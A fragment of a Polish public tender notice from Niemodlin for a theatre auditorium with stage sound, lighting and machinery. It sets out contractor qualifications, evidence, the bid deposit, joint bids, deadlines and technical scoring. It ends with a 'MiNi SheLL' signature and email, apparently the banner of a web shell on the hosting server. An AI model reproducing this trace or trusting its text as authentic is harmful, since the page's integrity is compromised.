class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O UDZIELENIE ZAMÓWIENIA MOGĄ UBIEGAĆ SIĘ WYKONAWCY, KTÓRZY SPEŁNIAJĄ NIŻEJ WYMIENIONE WARUNKI UDZIAŁU DOTYCZĄCE:<br/>1)	zdolności technicznej lub zawodowej – Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>a)	w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył: co najmniej trzy roboty budowlane, których przedmiotem była budowa, przebudowa lub modernizacja widowni dla min. stałej 250 osobowej widowni wraz ze sceną oraz z nagłośnieniem, oświetleniem i mechaniką sceny, o wartości min. 2 000 000,00 złotych brutto dla każdej z robót;<br/>b)	dysponuje lub będzie dysponował: osobą lub osobami zdolnymi do wykonania zamówienia tj.:<br/>- Kierownikiem budowy – osobą posiadającą: uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej bez ograniczeń;<br/>- Kierownikiem robót elektrycznych – osobą posiadającą: uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń;<br/>- Osobą do nadzoru robót technologii widowiskowej – osobą posiadającą co najmniej 5 letnie doświadczenie przy wykonywaniu lub nadzorowaniu instalacji systemów technologii widowiskowej w budynkach użyteczności publicznej o charakterze kulturalnym lub widowiskowym oraz który w okresie ostatnich pięciu lat przed upływem terminu składania ofert pełnił funkcję kierownika prac lub nadzorował wykonywanie co najmniej trzech zamówień obejmujących dostawę z instalacją systemów technologii widowiskowej (w tym między innymi systemów nagłośnieniowych, systemów oświetlenia scenicznego, systemów mechaniki sceny) w sali widowiskowej w obiektach użyteczności publicznej o charakterze kulturalnym, widowiskowym o wartości co najmniej 2 000 000 zł brutto;<br/>- Osobą do nadzoru robót mechaniki sceny – osobą posiadającą uprawnienia UDT w zakresie konserwacji urządzeń w kategoriach: DZ (dźwigniki) oraz W (wciągniki), a także posiadającym doświadczenie w pełnieniu funkcji kierownika prac mechaniki sceny lub specjalisty w zakresie mechaniki sceny przy realizacji minimum trzech robót w okresie ostatnich pięciu lat polegających na dostawie i montażu urządzeń mechaniki sceny, gdzie przynajmniej jedno urządzenie (w każdej z robót) zostało odebrane przez jednostkę Dozoru Technicznego;<br/>- specjalistą systemów nagłośnieniowych - osobą o wykształceniu wyższym w zakresie realizacji dźwięku z co najmniej 5 letnim doświadczeniem przy konfiguracji systemów elektroakustycznych w budynkach użyteczności publicznej o charakterze kulturalnym lub edukacyjnym oraz który w okresie ostatnich pięciu lat przed upływem terminu składania ofert wykonał co najmniej trzech konfiguracji systemów elektroakustycznych w salach widowiskowych w budynkach o charakterze kulturalnym lub edukacyjnym;<br/>- specjalistą systemów oświetlenia scenicznego – osobą z co najmniej 5 letnim doświadczeniem przy konfiguracji i uruchomieniu systemów oświetlenia scenicznego w budynkach użyteczności publicznej o charakterze kulturalnym lub edukacyjnym oraz który w okresie ostatnich pięciu lat przed upływem terminu składania ofert był odpowiedzialny za co najmniej trzech dostaw i uruchomień systemów oświetleniowych w salach widowiskowych w budynkach o charakterze kulturalnym lub edukacyjnym.<br/>Zamawiający dopuszcza łączenie poszczególnych funkcji przez jedną osobę. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni od dnia wezwania) następujących podmiotowych środków dowodowych (aktualnych na dzień złożenia):<br/>W celu potwierdzenia braku podstaw do wykluczenia:<br/>a) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 roku o ochronie konkurencji i konsumentów (Dz U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 7 do SWZ.<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ww. podmiotowy środek dowodowy, składa każdy z wykonawców występujących wspólnie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni od dnia wezwania) następujących podmiotowych środków dowodowych (aktualnych na dzień złożenia):<br/>1) W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Wg wzoru stanowiącego załącznik nr 5 do SWZ;<br/>b) wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wg wzoru stanowiącego załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Do oferty należy załączyć:<br/>1)	Specyfikację techniczną dla wybranych elementów przedmiotu zamówienia oferowanego przez Wykonawcę, opartą na wytycznych określonych na podstawie opisu przedmiotu zamówienia stanowią załącznik nr 1.1 do SWZ oraz <br/>2)	karty katalogowe dotyczące wyszczególnionych pozycji Specyfikacji technicznej dla wybranych elementów przedmiotu zamówienia tj. pozycji nr 1, 2, 13, 17, 20 i 63.<br/>2.	Specyfikacja techniczna dla wybranych elementów przedmiotu zamówienia oraz Karty katalogowe są przedmiotowym środkiem dowodowym służącym potwierdzeniu zgodności oferowanych sprzętów/materiałów/wyposażenia z wymaganiami, cechami lub kryteriami określonymi w opisie przedmiotu zamówienia lub opisie kryteriów oceny ofert, lub wymaganiami związanymi z realizacją zamówienia oraz służą do oceny w ramach kryterium „parametry techniczne”.<br/>3.	Wykonawca zobowiązany jest odpowiednio wypełnić Specyfikację techniczną dla wybranych elementów przedmiotu zamówienia oferowanego przez Wykonawcę, poprzez podanie szczegółowych parametrów technicznych zaoferowanego przedmiotu zamówienia:<br/>1) W kolumnie „Czy oferowany sprzęt/materiał/wyposażenie spełnia min. parametry?” należy podać informacje czy oferowany sprzęt/materiał spełnia minimalne wymagane parametry wymagane przez Zamawiającego – należy wpisać TAK lub NIE, brak wpisu w rubryce traktowane będzie jako NIE, a oferta podlegać będzie odrzuceniu na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp;<br/>2) W kolumnach „Marka” oraz „Model” należy podać informacje o marce i modelu oferowanego sprzętu/materiału/wyposażenia – należy wpisać dane umożliwiające pełną identyfikację sprzętu,w przypadku braku uzupełnienia tych kolumn w którejkolwiek pozycji Zamawiający ofertę odrzuci na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp;<br/>3)	W kolumnie „Spełnienie jednego z kryterium” w pozycjach nr 1, 2, 13, 17, 20 i 63 Specyfikacji technicznej dla wybranych elementów przedmiotu zamówienia oferowanego przez Wykonawcę, Wykonawca musi wskazać jakie parametry techniczne i funkcjonalne posiada oferowany sprzęt/materiał/wyposażenie poprzez wstawienie znaku X przy oferowanym parametrze. Podana informacja podlegać będzie ocenie w ramach kryterium „parametry techniczne”. W przypadku braku wskazania jednej z pozycji, oferta Wykonawcy w niniejszym kryterium oceny ofert uzyska 0 pkt, zaś w przypadku uznania takiej oferty za najkorzystniejszą, do realizacji umowy Zamawiający przyjmie, że Wykonawca zaoferował rozwiązania zgodne z załączoną kartą katalogową lub w przypadku jej braku z rozwiązaniem zgodnym z wymaganym przez Zamawiającego.<br/>4)	W kolumnie „Wymóg dołączenia do oferty Karty katalogowej Czy została dołączona?” dla pozycji nr 1, 2, 13, 17, 20 i 63 należy wskazać czy została dołączona wymagana karta katalogowa oraz należy dołączyć do oferty karty katalogowe umożliwiające weryfikację podanych przez Wykonawcę parametrów, podlegających ocenie. W przypadku braku dołączenia karty katalogowej dla którejś z pozycji, Wykonawca nie uzyska dodatkowych punktów w zakresie tej pozycji w ramach kryterium oceny ofert „parametry techniczne”. <br/>4.	W związku z art. 107 ust. 3 ustawy Pzp Zamawiający NIE WEZWIE Wykonawcy do złożenia lub uzupełnienia przedmiotowych środków dowodowych.<br/>5.	Jeżeli Wykonawca nie złoży przedmiotowego środka dowodowego o którym mowa w ust. 1 pkt 2 Zamawiający postąpi w sposób wskazany w ust. 3 pkt 4.<br/>6.	Jeżeli Wykonawca nie złoży podmiotowego środka dowodowego o którym mowa w ust. 1 pkt 1 Zamawiający ofertę odrzuci. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy załączyć:<br/>1)	Formularz ofertowy wg wzoru stanowiącego załącznik nr 1 do SWZ;<br/>2)	Oświadczenie wstępne Wykonawcy wg wzoru stanowiącego załącznik nr 2 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie wstępne składa każdy z Wykonawców;<br/>3)	Przedmiotowy środek dowodowy - Specyfikację techniczną dla wybranych elementów przedmiotu zamówienia oferowanego przez Wykonawcę, stanowiącą uzupełniony załącznik nr 1.1 do SWZ.<br/>4)	Przedmiotowy środek dowodowy – Karty katalogowe dotyczące pozycji nr 2, 13, 17, 20 i 63 Specyfikacji technicznej dla wybranych elementów przedmiotu zamówienia oferowanego przez Wykonawcę.<br/>5)	Oryginał gwarancji lub poręczenia, jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia;<br/>6)	Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>7)	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>8)	Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia - wg wzoru stanowiącego załącznik nr 3 do SWZ. W załączniku wykonawca składa również oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby;<br/>9)	Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia – wg wzoru stanowiącego załącznik nr 4 do SWZ.<br/>2. Przed podpisaniem umowy wybrany wykonawca przekaże Zamawiającemu: <br/>1)	pełnomocnictwo dla osób, które podpiszą umowę, <br/>2)	informacje niezbędne do wpisania do treści umowy, <br/>3)	harmonogram rzeczowo – finansowy przygotowany zgodnie z wytycznymi Zamawiającego<br/>i zatwierdzony przez niego przed umowy umowy i kosztorys ofertowy,<br/>4)	zabezpieczenie należytego wykonania umowy w wysokości i w formie przewidzianej w rodz. XXIII SWZ (przedłoży do akceptacji przez Zamawiającego treść zabezpieczenia należytego wykonania umowy w przypadku składania jego w innej formie jak w formie pieniężnej).<br/>3. Zamawiający informuje, że zgodnie z zapisami projektowanych postanowień umownych Wykonawca w terminie wskazanym w umowie ma obowiązek dostarczenia do Zamawiającego:<br/>1)	Polisy ubezpieczeniowej zawartej na potrzeby przedmiotowej inwestycji przez cały okres jej realizacji;<br/>4. Zgodnie z art. 18 ust. 3 ustawy Pzp, nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji. Jeżeli Wykonawca, nie później niż w terminie składania ofert, w sposób niebudzący wątpliwości zastrzegł, że nie mogą być one udostępniane oraz wykazał, załączając stosowne wyjaśnienia, iż<br/>zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Na platformie w formularzu składania oferty znajduje się miejsce wyznaczone do dołączenia części oferty stanowiącej tajemnicę przedsiębiorstwa. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga od Wykonawców wniesienia wadium w wysokości 50 000,00 (słownie: pięćdziesiąt tysięcy złotych 00/100).<br/>2. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2020r. poz. 299).<br/>3. W przypadku Wykonawców wspólnie składających ofertę (konsorcjów, spółek cywilnych), w treści gwarancji lub poręczeniu mają być wskazani odpowiednio: wszyscy konsorcjanci lub wspólnicy spółki.<br/>4. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art.98 ust.1 pkt 2 i 3 oraz ust.2 ustawy Pzp.<br/>5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek Zamawiającego: BS Namysłów O/Niemodlin 87 8890 1079 0009 4009 2006 0003 z adnotacją: „Wadium – nr postępowania i nazwa zadania”.<br/>6. W przypadku wnoszenia wadium w pieniądzu, Zamawiający uzna je za wniesione skutecznie jedynie w przypadku wpływu pieniędzy na rachunek bankowy Zamawiającego przed upływem terminu składania ofert.<br/>7. W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę jest warunkiem koniecznym, ale nie wystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.<br/>8. Wadium wniesione w formie niepieniężnej , tj. w formie gwarancji lub poręczenia musi być czynnością jednostronnie zobowiązującą, mieć taką samą płynność jak wadium wniesione w pieniądzu, obejmować odpowiedzialność za wszystkie przypadki powodujące zatrzymanie<br/>wadium przez Zamawiającego, określone w art. 98 ust. 6 ustawy Pzp.<br/>9. Wadium wniesione w formie niepieniężnej musi zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązanie wystawcy dokumentu do zapłaty kwoty wadium na rzecz Zamawiającego oraz termin obowiązywania gwarancji (poręczenia), który nie może być krótszy niż termin związania ofertą.<br/>10. W przypadku wyboru formy niepieniężnej, wadium Wykonawca zobowiązany jest wnieść przy użyciu środków komunikacji elektronicznej w formie oryginalnego elektronicznego dokumentu wadialnego (np. e-gwarancji bankowej lub ubezpieczeniowej) opatrzonego kwalifikowanym podpisem elektronicznym osoby upoważnionej do wystawienia dokumentu<br/>wadialnego (np. e-gwarancji bankowej lub ubezpieczeniowej).<br/>11. Niedopuszczalne jest złożenie skanu dokumentu wadialnego (np. e-gwarancji bankowej lub ubezpieczeniowej) opatrzonego kwalifikowanym podpisem elektronicznym.<br/>12. W przypadku wyboru formy niepieniężnej, wadium Wykonawca zobowiązany jest złożyć dokument wadialny wraz z ofertą w ten sam sposób co ofertę, tj. przy użyciu środków komunikacji elektronicznej, jednakże w wydzielonym odrębnym i oznaczonym pliku (np.: pdf).<br/>13. Zwrot i zatrzymanie wadium. Zwrot lub zatrzymanie wadium następuje w przypadkach określonych w art. 98 ustawy pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa w ust. 1 oświadczenie, o którym mowa w Rozdziale X ust. 1 składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>3. W przypadku, o którym mowa w ust 1, Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>4. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>5. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie zamówienia wskazują w treści oświadczenia stanowiącego zał. nr 4 do SWZ, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>6. Warunek w zakresie doświadczenia, dotyczący zdolności technicznej lub zawodowej musi potwierdzać co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7. Oferta musi być podpisana w taki sposób, by poprawnie zobowiązywała wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>8. Jeżeli w postępowaniu zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy regulującej współpracę tych Wykonawców.<br/>9. Zamawiający nie zastrzega obowiązku osobistego wykonania, przez poszczególnych wykonawców wspólnie ubiegających się o udzielenie zamówienia, kluczowych zadań dotyczących zamówień na roboty budowlane lub usługi.<br/>10. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>11. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.<br/>12. Wypełniając formularz oferty należy wpisać dane (nazwa, adres itd.) Pełnomocnika (Lidera) oraz wszystkich Wykonawców wspólnie ubiegających się o zamówienie. W innych dokumentach (załączniki) powołujących się na Wykonawcę w miejscu np. nazwa, adres Wykonawcy, należy wpisać dane dotyczące Pełnomocnika (Lidera) i Wykonawcy, którego dany dokument<br/>(załącznik) dotyczy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zamian w umowie na zasadach określonych w projektowanych postanowieniach umowy stanowiących zał. nr 8 do SWZ. Wszelkie zmiany i uzupełnienia treści umowy mogą być dokonywane wyłącznie a zgodą obydwu stron i stosownie uzasadnione, w formie pisemnej, pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-02 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/niemodlin</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-02 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-01</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Dalsza część SEKCJI IV – PRZEDMIOT ZAMÓWIENIA , 4.3.1.) Sposób oceny ofert: <br/>e) Poz. 13 w tabeli załącznika specyfikacja techniczna dla wybranych elementów przedmiotu zamówienia - Sterownik zabezpieczeń – punktacji podlega wbudowana konsoleta oświetleniowa z możliwością sterowania urządzeniami oświetleniowymi przez protokół ArtNET w przypadku wyłączonej konsolety głównej – ilość możliwych do zapisania scen świetlnych oznaczonych na potrzeby punktacji symbolem [S.C.]:<br/>- SC ≥ 1, SC ≤ 19 – 0 pkt.<br/>- SC ≥ 20 – 1 pkt<br/>f) Poz. 17 w tabeli załącznika specyfikacja techniczna dla wybranych elementów przedmiotu zamówienia - Optyka projektora – punktacji podlega ilość obiektywów:<br/>- Ilość obiektywów = 1 – 1 pkt<br/>- Ilość obiektywów ≥ 2 – 0 pkt.<br/>II. Urządzenia elektroakustyczne:<br/>a) Poz. 20 w tabeli załącznika specyfikacja techniczna dla wybranych elementów przedmiotu zamówienia - Konsoleta miksująca MIX 1 – punktacji podlega możliwość konfiguracji mono/stereo 24 wyjściowych szyn miksujących AUX/sub-grupa:<br/>- Brak możliwości konfiguracji MONO/STEREO szyn wyjściowych AUX/sub-grupa – 0 pkt.<br/>- Możliwość konfiguracji MONO/STEREO szyn wyjściowych AUX/sub-grupa – 4 pkt.<br/>b) Poz. 63 w tabeli załącznika specyfikacja techniczna dla wybranych elementów przedmiotu zamówienia - Zestaw głośnikowy LA 1 – LA 16 – punktacji podlega możliwość podwieszenia modułów szerokopasmowych z zestawami nisko tonowymi:<br/>- NIE – 0 pkt.<br/>- TAK – 3 pkt.<br/>c) Poz. 63 w tabeli załącznika specyfikacja techniczna dla wybranych elementów przedmiotu zamówienia - Zestaw głośnikowy LA 1 – LA 16 – punktacji podlega wielkość (średnica membrany) ciśnieniowego przetwornika wysokotonowego:<br/>- Przetwornik o średnicy ≤ 1,5 cala – 0 pkt.<br/>- Przetwornik o średnicy &gt; 1,5 cala i &lt; 3 cale – 1 pkt.<br/>- Przetwornik o średnicy ≥ 3 cale – 3 pkt.<br/>W przypadku:<br/>- braku zaznaczenia wybranego parametru lub zaznaczeniu kilku,<br/>- braku dołączenia do oferty Wykonawcy środka dowodowego – Karty katalogowej dla którejkolwiek z pozycji,<br/>- rozbieżności pomiędzy parametrem wskazanym przez Wykonawcę w specyfikacji technicznej dla wybranych elementów przedmiotu zamówienia a złożoną przez Wykonawcę karta katalogową;<br/>oferta Wykonawcy nie uzyska punktów w ramach danej pozycji w niniejszym kryterium oceny ofert. Jeżeli Wykonawca nie złoży podmiotowego środka dowodowego - specyfikacji technicznej dla wybranych elementów przedmiotu zamówienia, Zamawiający ofertę odrzuci. <br/>3. Za najkorzystniejszą zostanie uznana oferta, która otrzyma najwyższą ilość punktów w wyniku sumowania punktów w kryteriach oceny ofert i odpowiadającą wszystkim warunkom przedstawionym w niniejszej SWZ.<br/><br/>DODATKOWE WARUNKI WYKLUCZENIA:<br/>Zamawiający wykluczy również z postępowania Wykonawców, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r. poz. 835).

Creat By MiNi SheLL
Email: jattceo@gmail.com